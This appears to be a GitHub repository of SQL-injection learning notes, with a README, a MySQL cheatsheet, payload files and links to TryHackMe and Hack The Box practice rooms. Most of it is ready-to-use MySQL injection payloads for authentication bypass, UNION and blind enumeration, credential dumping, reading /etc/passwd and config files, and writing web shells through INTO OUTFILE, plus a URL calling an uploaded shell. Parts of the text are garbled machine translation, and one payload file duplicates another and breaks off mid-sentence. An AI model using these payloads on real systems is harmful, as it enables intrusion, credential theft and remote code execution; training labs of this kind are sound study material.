├── practice_room └── list ├── cheatsheet-33.md ├── README.md └── payload ├── payload.md └── payload.txt /practice_room/list: -------------------------------------------------------------------------------- 1 | Try Hack Me : 2 | 3 | https://tryhackme.com/room/sqlinjectionlm 4 | https://tryhackme.com/room/sqhell 5 | 6 | Hack The Box Academy : 7 | 8 | https://academy.hackthebox.com/module/33/section/177 9 | 10 | 11 | Port Swigger: 12 | 13 | -------------------------------------------------------------------------------- /cheatsheet-33.md: -------------------------------------------------------------------------------- 1 | ## MySQL 2 | 3 | | **Command** | **Description** | 4 | | --------------|-------------------| 5 | | **General** | 6 | | `mysql -u root -h docker.hackthebox.eu -P 3306 -p` | login to mysql database | 7 | | `SHOW DATABASES` | List available databases | 8 | | `USE users` | Switch to database | 9 | | **Tables** | 10 | | `CREATE TABLE logins (id INT, ...)` | Add a new table | 11 | | `SHOW TABLES` | List available tables in current database | 12 | | `DESCRIBE logins` | Show table properties and columns | 13 | | `INSERT INTO table_name VALUES (value_1,..)` | Add values to table | 14 | | `INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)` | Add values to specific columns in a table | 15 | | `UPDATE table_name SET column1=newvalue1, ... WHERE ` | Update table values | 16 | | **Columns** | 17 | | `SELECT * FROM table_name` | Show all columns in a table | 18 | | `SELECT column1, column2 FROM table_name` | Show specific columns in a table | 19 | | `DROP TABLE logins` | Delete a table | 20 | | `ALTER TABLE logins ADD newColumn INT` | Add new column | 21 | | `ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn` | Rename column | 22 | | `ALTER TABLE logins MODIFY oldColumn DATE` | Change column datatype | 23 | | `ALTER TABLE logins DROP oldColumn` | Delete column | 24 | | **Output** | 25 | | `SELECT * FROM logins ORDER BY column_1` | Sort by column | 26 | | `SELECT * FROM logins ORDER BY column_1 DESC` | Sort by column in descending order | 27 | | `SELECT * FROM logins ORDER BY column_1 DESC, id ASC` | Sort by two-columns | 28 | | `SELECT * FROM logins LIMIT 2` | Only show first two results | 29 | | `SELECT * FROM logins LIMIT 1, 2` | Only show first two results starting from index 2 | 30 | | `SELECT * FROM table_name WHERE ` | List results that meet a condition | 31 | | `SELECT * FROM logins WHERE username LIKE 'admin%'` | List results where the name is similar to a given string | 32 | 33 | ## MySQL Operator Precedence 34 | * Division (`/`), Multiplication (`*`), and Modulus (`%`) 35 | * Addition (`+`) and Subtraction (`-`) 36 | * Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`) 37 | * NOT (`!`) 38 | * AND (`&&`) 39 | * OR (`||`) 40 | 41 | ## SQL Injection 42 | | **Payload** | **Description** | 43 | | --------------|-------------------| 44 | | **Auth Bypass** | 45 | | `admin' or '1'='1` | Basic Auth Bypass | 46 | | `admin')-- -` | Basic Auth Bypass With comments | 47 | | [Auth Bypass Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass) | 48 | | **Union Injection** | 49 | | `' order by 1-- -` | Detect number of columns using `order by` | 50 | | `cn' UNION select 1,2,3-- -` | Detect number of columns using Union injection | 51 | | `cn' UNION select 1,@@version,3,4-- -` | Basic Union injection | 52 | | `UNION select username, 2, 3, 4 from passwords-- -` | Union injection for 4 columns | 53 | | **DB Enumeration** | 54 | | `SELECT @@version` | Fingerprint MySQL with query output | 55 | | `SELECT SLEEP(5)` | Fingerprint MySQL with no output | 56 | | `cn' UNION select 1,database(),2,3-- -` | Current database name | 57 | | `cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -` | List all databases | 58 | | `cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -` | List all tables in a specific database | 59 | | `cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -` | List all columns in a specific table | 60 | | `cn' UNION select 1, username, password, 4 from dev.credentials-- -` | Dump data from a table in another database | 61 | | **Privileges** | 62 | | `cn' UNION SELECT 1, user(), 3, 4-- -` | Find current user | 63 | | `cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -` | Find if user has admin privileges | 64 | | `cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -` | Find if all user privileges | 65 | | `cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -` | Find which directories can be accessed through MySQL | 66 | | **File Injection** | 67 | | `cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -` | Read local file | 68 | | `select 'file written successfully!' into outfile '/var/www/html/proof.txt'` | Write a string to a local file | 69 | | `cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- -` | Write a web shell into the base web directory | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SQL Injection 2 | ![sql-injection](https://user-images.githubusercontent.com/79256105/172219613-c1e688dc-d2fc-4a1c-9e56-35cb868ae5f2.png) 3 | 4 | # What is SQL Injection? 5 | SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. 6 | # Types of SQL Injection 7 | ![sql](https://user-images.githubusercontent.com/79256105/175160165-af1189b5-f22c-41fa-8d8e-7e4e1d14da57.png) 8 | 9 | ## Authentication Bypass(Subverting Query Logic) 10 | Subverting Query Login used to bypass authenticatio of login page . In this technique, hacker used true statement **' or 1=1 / ' or '1'='1'-- -** to bypass application query or user credentials matching. 11 | Some True Statement Payload : 12 | 13 | ' or '1' = '1 14 | ' or '1' = '1’ 15 | ' or '1' = '1 -- - 16 | ' or '1' = '1 # 17 | ##### 👁️‍🗨️ For More Payload check payload all things github repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection 18 | ## In-Band SQL Injection 19 | In simple cases, the output of both the intended and the new query may be printed directly on the front end, and we can directly read it. This is known as In-band SQL injection, and it has two types: **Union Based and Error Based.** 20 | 21 | ##### Error Based : 22 | Get the PHP or SQL errors in the front-end 23 | ##### Union Based: 24 | Get Fixed Column number and Uses Union query to get database information 25 | 26 | ## How to Indentify Error Based SQL Injection 27 | #### Step1: 28 | Find out injection parameter using fuzzing tools or manually 29 | #### Step2: 30 | Use Given below payoad 31 | 32 | Payload URL Encoded 33 | ' %27 34 | " %22 35 | # %23 36 | ; %3B 37 | ) %29 38 | If we get sql error , there has error based SQL injection and then, Use SQL Map for Automatic SQL Injection Pen-Testing / Manually Testing 39 | ##### 👁️‍🗨️ For More Payload check payload all things github repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection 40 | ## How to identify Union Base SQL Injection 41 | #### Step1: 42 | find out actual column number using order by / order by -- - operation 43 | #### Step2: 44 | use actual column number with union operation 45 | example: ' union select 1,2,3-- - 46 | #### Step3: 47 | check which column number show in your target website 48 | #### Step4: 49 | use union base payload in perfect column number to exploit database 50 | 51 | ## Method for dumping data from database using Uninon SQL Injection 52 | 53 | ##### Schema,Schemata check 54 | 55 | mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA; 56 | 57 | #### Step 1: Schema/Database check 58 | 59 | ' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - 60 | 61 | #### Step 2: Tables check 62 | 63 | ' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - 64 | 65 | Here , dev is database name which will replace to your target database name 66 | 67 | #### Step3: Columns check 68 | 69 | ' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - 70 | 71 | Here , credentials is table name whick will replace to your target table name 72 | 73 | #### Step4: Dum Data from table: 74 | 75 | ' UNION select 1, username, password, 4 from dev.credentials-- - 76 | 77 | Where username and password are column name , dev is database name , credentials is table name 78 | 79 | ## Read Data/Sensitive files using Union SQL Injection 80 | SELECT USER() 81 | SELECT CURRENT_USER() 82 | SELECT user from mysql.user 83 | 84 | #### Step 1:Privilege Check 85 | 86 | SELECT super_priv FROM mysql.user 87 | ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- - 88 | ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - 89 | ' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- - 90 | #### Step 2:Load File 91 | Now that we know we have enough privileges to read local system files, let us do that using the LOAD_FILE() function. The LOAD_FILE() function can be used in MariaDB / MySQL to read data from files. The function takes in just one argument, which is the file name. The following query is an example of how to read the /etc/passwd file: 92 | 93 | SELECT LOAD_FILE('/etc/passwd'); 94 | 95 | Example: 96 | ' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - 97 | 98 | #### Another Example 99 | 100 | We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php. 101 | 102 | ' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- - 103 | ' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- - 104 | ### Write Files Using Union SQL Injection or RCE Using SQL Injection 105 | Example 106 | 107 | ' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- - 108 | Web Shell Upload: 109 | 110 | ' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - 111 | 112 | Basic PHP Web Shell: 113 | 114 | 115 | 116 | OR 117 | 118 | 119 | 120 | ### For RCE , Call Uploaded Web shell 121 | 122 | Example : 123 | 124 | url/upload_file.php?parameter=commnad 125 | 126 | http://cyberteach360.com.bd/shell.php?cmd=id 127 | # Boolean Based SQL Injection 128 | Boolean based SQL Injection refers to the response we receive back from our injection attempts which could be a true/false, yes/no, on/off, 1/0 or any response which can only ever have two outcomes. That outcome confirms to us that our SQL Injection payload was either successful or not. On the first inspection, you may feel like this limited response can't provide much information. Still, in fact, with just these two responses, it's possible to enumerate a whole database structure and contents. 129 | 130 | #### Step 1:Find out actual column number 131 | 132 | 1.admin123' UNION SELECT 1;-- 133 | 2.admin123' UNION SELECT 1,2,3;-- 134 | if response is true till 1,2,3 but flase in 1,2,3,4 ,the target column ***number is 3*** 135 | 136 | #### Step 2:Find out database name 137 | 138 | admin123' UNION SELECT 1,2,3 where database() like 'some character%';-- 139 | example: 140 | admin123' UNION SELECT 1,2,3 where database() like 's%';-- 141 | 142 | Sequentially change the character and check the respons is true or flase 143 | suppose we got the ***database name :sqli_three*** 144 | 145 | #### Step 3:Find out table name 146 | 147 | 148 | admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';-- 149 | 150 | Sequentially change the character and check the respons is true or flase 151 | suppose we got the ***table name :users*** 152 | #### Step 4:Find out Column name 153 | 154 | admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id'; 155 | 156 | After,sequentially Repeating this process you will get column name. 157 | suppose, the ***column name username and another is password*** 158 | 159 | #### Step 5:Find out username column value 160 | 161 | admin123' UNION SELECT 1,2,3 from users where username like 'a% 162 | 163 | After,sequentially Repeating this process you will get ***column username value and this is:admin.*** 164 | 165 | #### Step 6:Find out password column value 166 | 167 | admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a% 168 | 169 | if you properly do this , you will get ***password and the credentials are username=admin ,password=3356 *** 170 | 171 | # Time Base SQL Injection 172 | 173 | A time-based blind SQL Injection is very similar to the above Boolean based, in that the same requests are sent, but there is no visual indicator of your queries being wrong or right this time. Instead, your indicator of a correct query is based on the time the query takes to complete. This time delay is introduced by using built-in methods such as ***SLEEP(x)*** alongside the UNION statement. The SLEEP() method will only ever get executed upon a successful UNION SELECT statement. 174 | So, for example, when trying to establish the number of columns in a table, you would use the following query: 175 | 176 | admin123' UNION SELECT SLEEP(5);-- 177 | 178 | #### Step 1:Find out actual column number 179 | 180 | admin123' UNION SELECT SLEEP(5);-- 181 | If there was no pause in the response time, we know that the query was unsuccessful, so like on previous tasks, we add another column: 182 | 183 | admin123' UNION SELECT SLEEP(5),2;-- 184 | if again no pause in the response time , increase column number like 185 | 186 | admin123' UNION SELECT SLEEP(5),2,3;-- 187 | ### Step 2:Find out database name 188 | admin123' UNION SELECT SLEEP(5),2,3 where database() like 'u%';-- 189 | Here dabase ***name :sqli_four*** 190 | ### Step 3:Find out table name 191 | admin123' UNION SELECT SLEEp(5),2,3 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'a%';-- 192 | Here ***table name:users*** 193 | 194 | #### Step4:Find out Column name 195 | 196 | admin123' UNION SELECT SLEEP(5),2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'a%'; 197 | Here Column name ***username and password*** 198 | 199 | #### Step5:Findout Column value 200 | admin123' UNION SELECT SLEEP(5),2,3 from users where username like 'a% 201 | Here ***username:admin*** 202 | admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a% 203 | Here ***password:pass*** 204 | SO the target login credentials 205 | ***username:admin 206 | password:pass*** 207 | ## Practicing and Learning Resources: 208 | 209 | #### Try Hack Me : 210 | 211 | https://tryhackme.com/room/sqlinjectionlm 212 | https://tryhackme.com/room/sqhell 213 | 214 | #### Hack The Box Academy : 215 | 216 | https://academy.hackthebox.com/module/33/section/177 217 | 218 | #### Port Swigger: 219 | https://portswigger.net/web-security/sql-injection 220 | 221 | -------------------------------------------------------------------------------- /payload/payload.md: -------------------------------------------------------------------------------- 1 | 0x01 basic 2 | 3 | Check the current database version 4 | 5 | VERSION () 6 | 7 | @@ VERSION 8 | 9 | @@ GLOBAL.VERSION 10 | 11 | Currently logged in user 12 | 13 | USER () 14 | 15 | CURRENT_USER () 16 | 17 | SYSTEM_USER () 18 | 19 | SESSION_USER () 20 | 21 | Currently used database 22 | 23 | DATABASE () 24 | 25 | SCHEMA () 26 | 27 | Path related 28 | 29 | @@ BASEDIR: mysql installation path: 30 | 31 | @@ SLAVE_LOAD_TMPDIR: Temporary folder path: 32 | 33 | @@ DATADIR: Data Storage Path: 34 | 35 | @@ CHARACTER_SETS_DIR: character set file path 36 | 37 | @@ LOG_ERROR: error log file path: 38 | 39 | @@ PID_FILE: pid-file file path 40 | 41 | @@ BASEDIR: mysql installation path: 42 | 43 | @@ SLAVE_LOAD_TMPDIR: Temporary folder path: 44 | 45 | Joint data 46 | 47 | CONCAT () 48 | 49 | GROUP_CONCAT () 50 | 51 | CONCAT_WS () 52 | 53 | Alphanumeric related 54 | 55 | ASCII (): Get the ascii code value of the letter 56 | 57 | BIN (): The binary string representation of the return value 58 | 59 | CONV (): hex conversion 60 | FLOOR () 61 | 62 | ROUND () 63 | 64 | LOWER (): turn into lowercase letters 65 | 66 | UPPER (): converted to capital letters 67 | 68 | HEX (): hexadecimal encoding 69 | 70 | UNHEX (): hexadecimal decoding 71 | 72 | String interception 73 | 74 | MID () 75 | 76 | LEFT () 77 | 78 | SUBSTR () 79 | 80 | SUBSTRING () 81 | 82 | Comments 83 | 84 | Interline comments 85 | 86 | - - (- there is a space behind) 87 | - 88 | DROP sampletable; - 89 | 90 | # 91 | DROP sampletable; # 92 | 93 | `(Backtick) 94 | 95 | Inline comments 96 | / * * / + DROP / * content * / sampletable; 97 | / *! Statement * / 98 | / *! select * from test * / 99 | 100 | Statement will be executed 101 | 102 | 0x02 injection technology 103 | 104 | Determine whether there is injection 105 | 106 | Assumptions are: www.test.com/chybeta.php?id=1 107 | 108 | Numeric injection 109 | 110 | chybeta.php?id=1+1 111 | 112 | chybeta.php?id=-1 or 1=1 113 | 114 | chybeta.php?id=-1 or 10-2=8 115 | 116 | chybeta.php?id=1 and 1=2 117 | 118 | chybeta.php?id=1 and 1=1 119 | 120 | Character injection 121 | 122 | The parameters are surrounded by quotes, we need to close the quotes. 123 | 124 | chybeta.php?id=1' 125 | 126 | chybeta.php?id=1" 127 | 128 | chybeta.php?id=1' and '1'='1 129 | 130 | chybeta.php?id=1" and "1"="1 131 | 132 | Joint inquiry 133 | 134 | Query the number of columns 135 | 136 | With UNION SELECT injection, if the data to be noted later out of the column with the original number of data columns, it will fail. So need to guess the number of columns. 137 | 138 | UNION SELECT 139 | 140 | UNION SELECT 1,2,3 # 141 | 142 | UNION ALL SELECT 1,2,3 # 143 | 144 | UNION ALL SELECT null,null,null # 145 | 146 | ORDER BY 147 | 148 | Use dichotomy 149 | 150 | ORDER BY 10 # 151 | 152 | ORDER BY 5 # 153 | 154 | ORDER BY 2 # 155 | 156 | .... 157 | Query the database 158 | 159 | UNION SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA # 160 | 161 | Query table name 162 | 163 | UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() # 164 | 165 | Assuming to obtain the database name "databasename", its hexadecimal encoding 0x64617461626173656e616d65. 166 | 167 | UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x64617461626173656e616d65 # 168 | 169 | Query column name 170 | 171 | Obtained from the previous step to the table named tablename, its hexadecimal code obtained 172 | 173 | UNION SELECT GROUP_CONCAT(column_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7461626c656e616d65 # 174 | 175 | retrieve data 176 | 177 | UNION SELECT GROUP_CONCAT(column_1,column_2 SEPARATOR+0x3c62723e) FROM databasename.tablename # 178 | 179 | insert / update / delete injection 180 | 181 | Reference: SQL Injection in Insert Update and Delete Statements Assuming the background statement is: 182 | 183 | insert into user(id,name,pass) values (1,"chybeta","123456"); 184 | 185 | order by after injection 186 | 187 | This part finishing self- sleepy Dragon: MySql injection science popularize by the sort statement, so you can use the conditional statements to make judgments, according to the return of the different sorts of results to determine the true and false conditions. 188 | 189 | Detection method 190 | Generally with oder or orderby variables is likely to be such an injection, when you know a field can be injected as follows: 191 | Original link: http://www.test.com/list.php?order=vote Sort according to the vote field. 192 | 193 | Find the largest number of votes to vote num Then construct the following link to see whether the sort of change. : 194 | list.php?order=abs(vote-(length(user())>0)*num)+asc 195 | 196 | Another method does not need to know any field information, use the rand function: 197 | list.php?order=rand(true) 198 | list.php?order=rand(false) 199 | The above two will return a different sort. 200 | payload 201 | 202 | The statement to determine whether the first character in the table name is less than 128 is as follows: 203 | http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)) 204 | Error injection 205 | Blind betting 206 | Blind scene 207 | In many cases, through the previous test will find the page did not echo the extracted data, but depending on whether the statement is executed successfully or not, there will be some corresponding changes. 208 | The correct / wrong statement makes the page have a moderate change. You can try using Boolean injection 209 | The correct statement returns the normal page, the wrong statement returns the common error page. You can try using Boolean injection. 210 | Submit the wrong statement, does not affect the normal output of the page. Try using delayed injection. 211 | 212 | Several simple sentences to judge, in the real need to change according to the situation: 213 | CASE 214 | IF () 215 | IFNULL () 216 | NULLIF () 217 | Boolean blinds - based on the response 218 | Submit a logic statement to infer a bit of information. Because injection requires (general) character-by-character execution, scripts or tools (such as the burp suite) need to be used. The following is: 219 | payload 220 | // i 用于提取每一个位，j 用于判断其对应的ASCII码值的范围。 221 | // k ，结合limit，选择偏移为k的行 222 | // **中可以填上其他的select语句，比如查询表名，列名，数据。一次类推。 223 | // SUBSTR() 也可以换成 SUBSTRING() 224 | 225 | ' OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) < j) # 226 | 227 | ' OR (SELECT ASCII(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) ) < j) # 228 | 229 | ' OR (SELECT SUBSTR(DATABASE(),i,1) < j) # 230 | 231 | ' OR (SELECT SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j) # 232 | 233 | ' OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) < j # 234 | 235 | ... 236 | 237 | script 238 | 239 | Script use, visible: ctf blind using script points: 240 | 241 | Pay attention to the coding problem 242 | Pay attention to the exception handling 243 | Pay attention to the border processing 244 | Delayed blinds - based on time 245 | Generally use a few functions. The effect of using these is to delay the operation of mysql, and thus detect the situation with the usual difference: 246 | SLEEP (n) to stop mysql n seconds 247 | BENCHMARK (count, expr) Repeats the countTimes occurrence of the expression expr 248 | 249 | Some notes: 250 | The use of time-based blinds is not as accurate as it depends on the current network environment. 251 | Time delay is best not to exceed 30 seconds, otherwise easily lead to mysql API connection timeout. 252 | When the page does not see any significant change, then consider the choice of using delayed injection. 253 | Detection method 254 | 1 OR SLEEP(25)=0 LIMIT 1 # 255 | 1) OR SLEEP(25)=0 LIMIT 1 # 256 | 1' OR SLEEP(25)=0 LIMIT 1 # 257 | ') OR SLEEP(25)=0 LIMIT 1 # 258 | 1)) OR SLEEP(25)=0 LIMIT 1 # 259 | SELECT SLEEP(25) # 260 | 261 | payload 262 | 263 | UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,BENCHMARK(100000,SHA1(1)),0) 264 | 265 | UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,SLEEP(10),0) 266 | 267 | ... 268 | Wide byte injection 269 | principle 270 | Have the following php code: 271 | ... 272 | mysql_query("SET NAMES 'gbk'"); 273 | .... 274 | $name = isset($_GET['name']) ? addslashes($_GET['name']) : 1; 275 | $sql = "SELECT * FROM test WHERE names='{$name}'"; 276 | addslashes () adds a single or double quotation mark \. When mysql GBK character set, it will be two characters as a Chinese character, such as% df% 5c for transport. We enter name=root%df%27,% the server will appear the following conversion: root%df%27-> root%df%5c%27-> root運'. 277 | More can be seen: Character Encoding and SQL Injection in White Box Audit 278 | payload 279 | Eat\ 280 | index.php?name=1%df' 281 | index.php?name=1%a1' 282 | index.php?name=1%aa' 283 | ... 284 | After being addedlashes,% XX% 5c appears. If the ascii code value of the current character is greater than 128, it will be considered as a wide character, even if it is not a Chinese character. So not only% df can eat '\'. 285 | use\ 286 | index.php?name=%**%5c%5c%27 287 | Secondary injection 288 | File read and write 289 | Use sql injection can import export file, get the file content, or write to the file content. Query user read and write permissions: 290 | SELECT file_priv FROM mysql.user WHERE user = 'username'; 291 | load_file () read 292 | condition 293 | Need to read the file permissions 294 | Need to know the absolute physical path of the file. 295 | The size of the file to read must be less than max_allowed_packet 296 | SELECT @@max_allowed_packet; 297 | payload 298 | Directly use the absolute path, pay attention to the processing of the slash path. 299 | UNION SELECT LOAD_FILE("C://TEST.txt") # 300 | 301 | UNION SELECT LOAD_FILE("C:/TEST.txt") # 302 | 303 | UNION SELECT LOAD_FILE("C:\\TEST.txt") # 304 | Use encoding 305 | 306 | UNION SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116)) # 307 | 308 | UNION SELECT LOAD_FILE(0x433a5c5c544553542e747874) # 309 | select Export 310 | condition 311 | General to specify the absolute path 312 | The directory to be exported has write permission 313 | The file to outfile can not already exist 314 | payload 315 | UNION SELECT DATABASE() INTO OUTFILE 'C:\\phpstudy\\WWW\\test\\1'; 316 | 317 | UNION SELECT DATABASE() INTO OUTFILE 'C:/phpstudy/WWW/test/1'; 318 | 319 | Write webshell 320 | condition 321 | Need to know the site's absolute physical path, so after export webshell can be accessed 322 | Need to export the directory can write permission. 323 | payload 324 | UNION SELECT "" INTO OUTFILE 'C:/phpstudy/WWW/test/webshell.php'; 325 | Universal password login 326 | admin '- 327 | admin '# 328 | admin '/ * 329 | or '=' or 330 | 'or 1 = 1- 331 | 'or 1 = 1 # 332 | 'or 1 = 1 / * 333 | ') or' 1 '=' 1- 334 | ') or (' 1 '=' 1- 335 | PDO heap query 336 | -------------------------------------------------------------------------------- /payload/payload.txt: -------------------------------------------------------------------------------- 1 | 1 UNION SELECT 1 2 | 1 UNION SELECT 1,2 3 | 1 UNION SELECT 1,2,3 4 | 5 | If Union Base SQL Injection Have: 6 | 7 | 0 UNION SELECT 1,2,database() 8 | 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one' 9 | 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users' 10 | 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '
') FROM staff_users 11 | 12 | 13 | --------- dump data from 2 different tables ---------- 14 | 15 | http://10.10.8.191/user?id=2%20UNION%20ALL%20SELECT%20%271%20union%20select%201,flag,3,4%20from%20flag%27,%202,3%20from%20users 16 | 17 | 2 UNION ALL SELECT '1 union select 1,flag,3,4 from flag', 2,3 from users 18 | 19 | ------------------- -------------------- 20 | ------------------- -------------------- 21 | 22 | 0x01 basic 23 | Check the current database version 24 | VERSION () 25 | @@ VERSION 26 | @@ GLOBAL.VERSION 27 | Currently logged in user 28 | USER () 29 | CURRENT_USER () 30 | SYSTEM_USER () 31 | SESSION_USER () 32 | Currently used database 33 | DATABASE () 34 | SCHEMA () 35 | Path related 36 | @@ BASEDIR: mysql installation path: 37 | @@ SLAVE_LOAD_TMPDIR: Temporary folder path: 38 | @@ DATADIR: Data Storage Path: 39 | @@ CHARACTER_SETS_DIR: character set file path 40 | @@ LOG_ERROR: error log file path: 41 | @@ PID_FILE: pid-file file path 42 | @@ BASEDIR: mysql installation path: 43 | @@ SLAVE_LOAD_TMPDIR: Temporary folder path: 44 | Joint data 45 | CONCAT () 46 | GROUP_CONCAT () 47 | CONCAT_WS () 48 | Alphanumeric related 49 | ASCII (): Get the ascii code value of the letter 50 | BIN (): The binary string representation of the return value 51 | CONV (): hex conversion 52 | FLOOR () 53 | ROUND () 54 | LOWER (): turn into lowercase letters 55 | UPPER (): converted to capital letters 56 | HEX (): hexadecimal encoding 57 | UNHEX (): hexadecimal decoding 58 | String interception 59 | MID () 60 | LEFT () 61 | SUBSTR () 62 | SUBSTRING () 63 | Comments 64 | Interline comments 65 | - - (- there is a space behind) 66 | DROP sampletable; - 67 | # 68 | DROP sampletable; # 69 | `(Backtick) 70 | Inline comments 71 | / * * / + DROP / * content * / sampletable; 72 | / *! Statement * / 73 | / *! select * from test * / 74 | Statement will be executed 75 | 0x02 injection technology 76 | Determine whether there is injection 77 | Assumptions are: www.test.com/chybeta.php?id=1 78 | Numeric injection 79 | chybeta.php?id=1+1 80 | chybeta.php?id=-1 or 1=1 81 | chybeta.php?id=-1 or 10-2=8 82 | chybeta.php?id=1 and 1=2 83 | chybeta.php?id=1 and 1=1 84 | Character injection 85 | The parameters are surrounded by quotes, we need to close the quotes. 86 | chybeta.php?id=1' 87 | chybeta.php?id=1" 88 | chybeta.php?id=1' and '1'='1 89 | chybeta.php?id=1" and "1"="1 90 | Joint inquiry 91 | Query the number of columns 92 | With UNION SELECT injection, if the data to be noted later out of the column with the original number of data columns, it will fail. So need to guess the number of columns. 93 | UNION SELECT 94 | UNION SELECT 1,2,3 # 95 | UNION ALL SELECT 1,2,3 # 96 | UNION ALL SELECT null,null,null # 97 | ORDER BY 98 | Use dichotomy 99 | ORDER BY 10 # 100 | ORDER BY 5 # 101 | ORDER BY 2 # 102 | .... 103 | Query the database 104 | UNION SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA # 105 | Query table name 106 | UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() # 107 | Assuming to obtain the database name "databasename", its hexadecimal encoding 0x64617461626173656e616d65. 108 | UNION SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x64617461626173656e616d65 # 109 | Query column name 110 | Obtained from the previous step to the table named tablename, its hexadecimal code obtained 111 | UNION SELECT GROUP_CONCAT(column_name SEPARATOR+0x3c62723e) FROM+INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7461626c656e616d65 # 112 | retrieve data 113 | UNION SELECT GROUP_CONCAT(column_1,column_2 SEPARATOR+0x3c62723e) FROM databasename.tablename # 114 | insert / update / delete injection 115 | Reference: SQL Injection in Insert Update and Delete Statements Assuming the background statement is: 116 | insert into user(id,name,pass) values (1,"chybeta","123456"); 117 | order by after injection 118 | This part finishing self- sleepy Dragon: MySql injection science popularize by the sort statement, so you can use the conditional statements to make judgments, according to the return of the different sorts of results to determine the true and false conditions. 119 | Detection method 120 | Generally with oder or orderby variables is likely to be such an injection, when you know a field can be injected as follows: 121 | Original link: http://www.test.com/list.php?order=vote Sort according to the vote field. 122 | Find the largest number of votes to vote num Then construct the following link to see whether the sort of change. : 123 | list.php?order=abs(vote-(length(user())>0)*num)+asc 124 | Another method does not need to know any field information, use the rand function: 125 | list.php?order=rand(true) 126 | list.php?order=rand(false) 127 | The above two will return a different sort. 128 | payload 129 | The statement to determine whether the first character in the table name is less than 128 is as follows: 130 | http://www.test.com/list.php?order=rand((select char(substring(table_name,1,1)) from information_schema.tables limit 1)<=128)) 131 | Error injection 132 | Blind betting 133 | Blind scene 134 | In many cases, through the previous test will find the page 